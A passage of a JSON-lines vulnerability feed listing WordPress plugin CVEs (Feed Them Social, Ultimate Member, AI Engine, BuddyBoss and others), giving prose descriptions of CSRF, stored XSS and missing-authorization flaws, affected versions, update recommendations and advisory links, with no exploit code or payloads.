version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/64bc7d47-6b63-4fd9-85d4-82126f86308a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/64bc7d47-6b63-4fd9-85d4-82126f86308a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/google-listings-and-ads\\\/tags\\\/2.8.6\\\/vendor\\\/googleads\\\/google-ads-php\\\/scripts\\\/print_php_information.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/google-listings-and-ads\\\/tags\\\/2.8.6\\\/vendor\\\/googleads\\\/google-ads-php\\\/scripts\\\/print_php_information.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36739","slug":"feed-them-social","versionEndExcluding":"2.8.7","description":"The Feed Them Social \u2013 Page, Post, Video, and Photo Galleries plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.8.6. This is due to missing or incorrect nonce validation on the my_fts_fb_load_more() function. This makes it possible for unauthenticated attackers to load feeds via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2369818%40feed-them-social&new=2369818%40feed-them-social&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2369818%40feed-them-social&new=2369818%40feed-them-social&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1fcbe3d1-449c-4135-bbf5-9ea9236e5328?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1fcbe3d1-449c-4135-bbf5-9ea9236e5328?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5602","slug":"ultimate-social-media-icons","versionImpact":"2.8.5","versionEndExcluding":"2.8.6","description":"The Social Media Share Buttons & Social Sharing Icons plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.8.5. This is due to missing or incorrect nonce validation on several functions corresponding to AJAX actions. This makes it possible for unauthenticated attackers to invoke those actions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 2.8.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d44a45fb-3bff-4a1f-8319-a58a47a9d76b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d44a45fb-3bff-4a1f-8319-a58a47a9d76b?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2975574\\\/ultimate-social-media-icons\\\/tags\\\/2.8.6\\\/libs\\\/controllers\\\/sfsi_buttons_controller.php?old=2956446&old_path=ultimate-social-media-icons%2Ftags%2F2.8.5%2Flibs%2Fcontrollers%2Fsfsi_buttons_controller.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2975574\\\/ultimate-social-media-icons\\\/tags\\\/2.8.6\\\/libs\\\/controllers\\\/sfsi_buttons_controller.php?old=2956446&old_path=ultimate-social-media-icons%2Ftags%2F2.8.5%2Flibs%2Fcontrollers%2Fsfsi_buttons_controller.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5070","slug":"ultimate-social-media-icons","versionImpact":"2.8.5","versionEndExcluding":"2.8.6","description":"The Social Media Share Buttons & Social Sharing Icons plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 2.8.5 via the sfsi_save_export function. This can allow subscribers to export plugin settings that include social media authentication tokens and secrets as well as app passwords.","recommendation":"Update to version 2.8.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e9e43c5b-a094-44ab-a8a3-52d437f0e00d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e9e43c5b-a094-44ab-a8a3-52d437f0e00d?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2975574\\\/ultimate-social-media-icons\\\/tags\\\/2.8.6\\\/libs\\\/controllers\\\/sfsi_buttons_controller.php?old=2956446&old_path=ultimate-social-media-icons%2Ftags%2F2.8.5%2Flibs%2Fcontrollers%2Fsfsi_buttons_controller.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2975574\\\/ultimate-social-media-icons\\\/tags\\\/2.8.6\\\/libs\\\/controllers\\\/sfsi_buttons_controller.php?old=2956446&old_path=ultimate-social-media-icons%2Ftags%2F2.8.5%2Flibs%2Fcontrollers%2Fsfsi_buttons_controller.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1064","slug":"easy-login-woocommerce","versionImpact":"2.8.5","versionEndExcluding":"2.8.6","description":"The Login\/Signup Popup ( Inline Form + Woocommerce ) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's xoo_el_action shortcode in all versions up to, and including, 2.8.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.8.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3239293\\\/easy-login-woocommerce\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3239293\\\/easy-login-woocommerce\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd62a072-8619-4f51-a52f-2ada7e455cb1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd62a072-8619-4f51-a52f-2ada7e455cb1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13860","slug":"buddyboss-platform","versionImpact":"2.8.50","versionEndExcluding":"2.8.51","description":"The Buddyboss Platform plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018bbp_topic_title\u2019 parameter in all versions up to, and including, 2.8.50 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The vulnerability was partially patched in version 2.8.41.","recommendation":"Update to version 2.8.51, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/example\\\/social\\\/forums\\\/forum\\\/redteam\\\/\",\"name\":\"https:\\\/\\\/example\\\/social\\\/forums\\\/forum\\\/redteam\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.buddyboss.com\\\/platform\\\/\",\"name\":\"https:\\\/\\\/www.buddyboss.com\\\/platform\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a0ac8a41-553e-473b-82a7-226de17e472d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a0ac8a41-553e-473b-82a7-226de17e472d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13859","slug":"buddyboss-platform","versionImpact":"2.8.50","versionEndExcluding":"2.8.51","description":"The Buddyboss Platform plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018bp_nouveau_ajax_media_save\u2019 function in all versions up to, and including, 2.8.50 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The vulnerability was partially patched in version 2.8.41.","recommendation":"Update to version 2.8.51, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.buddyboss.com\\\/platform\\\/\",\"name\":\"https:\\\/\\\/www.buddyboss.com\\\/platform\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d77c8096-40b1-4ac7-881f-6aed98da6752?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d77c8096-40b1-4ac7-881f-6aed98da6752?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11832","slug":"beaver-builder-lite-version","versionImpact":"2.8.4.4","versionEndExcluding":"2.8.5.3","description":"The Beaver Builder \u2013 WordPress Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the custom JavaScript row settings in all versions up to, and including, 2.8.4.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.8.5.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3206556%40beaver-builder-lite-version&new=3206556%40beaver-builder-lite-version&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3206556%40beaver-builder-lite-version&new=3206556%40beaver-builder-lite-version&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1988ff5e-2d3f-4901-8bcc-eb0a7da7566c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1988ff5e-2d3f-4901-8bcc-eb0a7da7566c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2508","slug":"mobile-menu","versionImpact":"2.8.4.4","versionEndExcluding":"2.8.5","description":"The WP Mobile Menu plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the save_menu_item_icon function in all versions up to, and including, 2.8.4.4. This makes it possible for unauthenticated attackers to add the '_mobmenu_icon' post meta to arbitrary posts with an arbitrary (but sanitized) value. NOTE: Version 2.8.4.4 contains a partial fix for this vulnerability.","recommendation":"Update to version 2.8.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3cd9569f-3cda-4482-8ccd-c3f362b4e651?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3cd9569f-3cda-4482-8ccd-c3f362b4e651?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fmobile-menu%2Ftrunk%2Fincludes%2Fclass-wp-mobile-menu-core.php&old=3125561&new_path=%2Fmobile-menu%2Ftrunk%2Fincludes%2Fclass-wp-mobile-menu-core.php&new=3125561&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fmobile-menu%2Ftrunk%2Fincludes%2Fclass-wp-mobile-menu-core.php&old=3125561&new_path=%2Fmobile-menu%2Ftrunk%2Fincludes%2Fclass-wp-mobile-menu-core.php&new=3125561&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2765","slug":"ultimate-member","versionImpact":"2.8.4","versionEndExcluding":"2.8.5","description":"The Ultimate Member \u2013 User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Skype and Spotify URL parameters in all versions up to, and including, 2.8.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.8.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/86ddd5fd-137b-478e-952e-b36fc6a5c28d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/86ddd5fd-137b-478e-952e-b36fc6a5c28d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/ultimatemember\\\/ultimatemember\\\/blob\\\/de04d89a49dfb9baf4019ea77b1edfbcd17fd849\\\/includes\\\/core\\\/um-filters-fields.php#L472\",\"name\":\"https:\\\/\\\/github.com\\\/ultimatemember\\\/ultimatemember\\\/blob\\\/de04d89a49dfb9baf4019ea77b1edfbcd17fd849\\\/includes\\\/core\\\/um-filters-fields.php#L472\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/ultimatemember\\\/ultimatemember\\\/blob\\\/de04d89a49dfb9baf4019ea77b1edfbcd17fd849\\\/includes\\\/core\\\/um-filters-fields.php#L117\",\"name\":\"https:\\\/\\\/github.com\\\/ultimatemember\\\/ultimatemember\\\/blob\\\/de04d89a49dfb9baf4019ea77b1edfbcd17fd849\\\/includes\\\/core\\\/um-filters-fields.php#L117\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3067953%40ultimate-member&new=3067953%40ultimate-member&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3067953%40ultimate-member&new=3067953%40ultimate-member&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/ultimatemember\\\/ultimatemember\\\/pull\\\/1491\\\/files\",\"name\":\"https:\\\/\\\/github.com\\\/ultimatemember\\\/ultimatemember\\\/pull\\\/1491\\\/files\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6238","slug":"ai-engine","versionImpact":"2.8.4","versionEndExcluding":"2.8.5","description":"The AI Engine plugin for WordPress is vulnerable to open redirect in version 2.8.4. This is due to an insecure OAuth implementation, as the 'redirect_uri' parameter is missing validation during the authorization flow. This makes it possible for unauthenticated attackers to intercept the authorization code and obtain an access token by redirecting the user to an attacker-controlled URI. Note: OAuth is disabled, the 'Meow_MWAI_Labs_OAuth' class is not loaded in the plugin in the patched version 2.8.5.","recommendation":"Update to version 2.8.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-engine\\\/tags\\\/2.8.4\\\/labs\\\/oauth.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-engine\\\/tags\\\/2.8.4\\\/labs\\\/oauth.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3321384\\\/ai-engine\\\/trunk\\\/labs\\\/mcp.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3321384\\\/ai-engine\\\/trunk\\\/labs\\\/mcp.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3321384\\\/ai-engine\\\/trunk\\\/labs\\\/oauth.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3321384\\\/ai-engine\\\/trunk\\\/labs\\\/oauth.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1edc84fd-8cb5-4899-9444-1b6ae3144917?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1edc84fd-8cb5-4899-9444-1b6ae3144917?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5570","slug":"ai-engine","versionImpact":"2.8.4","versionEndExcluding":"2.8.5","description":"The AI Engine plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the mwai_chatbot shortcode 'id' parameter in all versions up to, and including, 2.8.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.8.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-engine\\\/tags\\\/2.8.2\\\/classes\\\/modules\\\/chatbot.php#L617\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-engine\\\/tags\\\/2.8.2\\\/classes\\\/modules\\\/chatbot.php#L617\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a32dcf96-ec75-46b1-8f1d-608411ad5147?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a32dcf96-ec75-46b1-8f1d-608411ad5147?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8482","slug":"simple-local-avatars","versionImpact":"2.8.4","versionEndExcluding":"2.8.5","description":"The Simple Local Avatars plugin for WordPress is vulnerable to unauthorized modification of data in version 2.8.4. This is due to a missing capability check on the migrate_from_wp_user_avatar() function. This makes it possible for authenticated attackers, with subscriber-level access and above, to migrate avatar metadata for all users.","recommendation":"Update to version 2.8.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-local-avatars\\\/tags\\\/2.8.4\\\/includes\\\/class-simple-local-avatars.php#L123\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-local-avatars\\\/tags\\\/2.8.4\\\/includes\\\/class-simple-local-avatars.php#L123\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-local-avatars\\\/tags\\\/2.8.4\\\/includes\\\/class-simple-local-avatars.php?marks=1663-1672#L1663\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-local-avatars\\\/tags\\\/2.8.4\\\/includes\\\/class-simple-local-avatars.php?marks=1663-1672#L1663\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3340223%40simple-local-avatars&new=3340223%40simple-local-avatars&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3340223%40simple-local-avatars&new=3340223%40simple-local-avatars&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/69d78334-2b38-43ee-acf6-c073d5826213?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/69d78334-2b38-43ee-acf6-c073d5826213?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2816","slug":"page-views-count","versionImpact":"2.8.4","versionEndExcluding":"2.8.5","description":"The Page View Count plugin for WordPress is vulnerable to unauthorized modification of data that can lead to a denial of service due to a missing capability check on the yellow_message_dontshow() function in versions 2.8.0 to 2.8.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update option values to one on the WordPress site. This can be leveraged to update an option that would create an error on the site and deny service to legitimate users or be used to set some values to true such as registration.","recommendation":"Update to version 2.8.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3282975%40page-views-count&new=3282975%40page-views-count&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3282975%40page-views-count&new=3282975%40page-views-count&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e6fb9558-06e5-4297-93df-ee9a6971f0ec?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e6fb9558-06e5-4297-93df-ee9a6971f0ec?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3987","slug":"mobile-menu","versionImpact":"2.8.4.2","versionEndExcluding":"2.8.4.3","description":"The WP Mobile Menu \u2013 The Mobile-Friendly Responsive Menu plugin for WordPress is vulnerable to Stored Cross-Site Scripting via image alt text in all versions up to, and including, 2.8.4.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.8.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7bcbc6b6-ed05-4709-bf05-214418798339?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7bcbc6b6-ed05-4709-bf05-214418798339?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097563\\\/mobile-menu\\\/trunk\\\/includes\\\/class-wp-mobile-menu-core.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097563\\\/mobile-menu\\\/trunk\\\/includes\\\/class-wp-mobile-menu-core.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2123","slug":"ultimate-member","versionImpact":"2.8.3","versionEndExcluding":"2.8.4","description":"The Ultimate Member \u2013 User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the several parameters in all versions up to, and including, 2.8.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.8.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c8bc1653-8fee-468a-bb6d-f24959846ee5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c8bc1653-8fee-468a-bb6d-f24959846ee5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-member\\\/trunk\\\/templates\\\/members-grid.php#L44\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-member\\\/trunk\\\/templates\\\/members-grid.php#L44\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-member\\\/trunk\\\/templates\\\/members-grid.php#L53\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-member\\\/trunk\\\/templates\\\/members-grid.php#L53\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-member\\\/trunk\\\/templates\\\/members-grid.php#L65\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-member\\\/trunk\\\/templates\\\/members-grid.php#L65\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-member\\\/trunk\\\/templates\\\/members-list.php#L39\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-member\\\/trunk\\\/templates\\\/members-list.php#L39\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-member\\\/trunk\\\/templates\\\/members-list.php#L53\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-member\\\/trunk\\\/templates\\\/members-list.php#L53\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3046611\\\/ultimate-member#file746\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3046611\\\/ultimate-member#file746\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5071","slug":"ai-engine","versionImpact":"2.8.3","versionEndExcluding":"2.8.4","description":"The AI Engine plugin for WordPress is vulnerable to unauthorized modification of data and loss of data due to a missing capability check on the 'Meow_MWAI_Labs_MCP::can_access_mcp' function in versions 2.8.0 to 2.8.3. This makes it possible for authenticated attackers, with subscriber-level access and above, to have full access to the MCP and run various commands like 'wp_create_user', 'wp_update_user' and 'wp_update_option', which can be used for privilege escalation, and 'wp_update_post', 'wp_delete_post', 'wp_update_comment' and 'wp_delete_comment', which can be used to edit and delete posts and comments.","recommendation":"Update to version 2.8.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-engine\\\/tags\\\/2.8.1\\\/labs\\\/mcp.php#L43\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-engine\\\/tags\\\/2.8.1\\\/labs\\\/mcp.php#L43\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3313554\\\/ai-engine#file21\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3313554\\\/ai-engine#file21\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e7654a1-0020-4bf1-86be-bdb238a9fe0d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e7654a1-0020-4bf1-86be-bdb238a9fe0d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
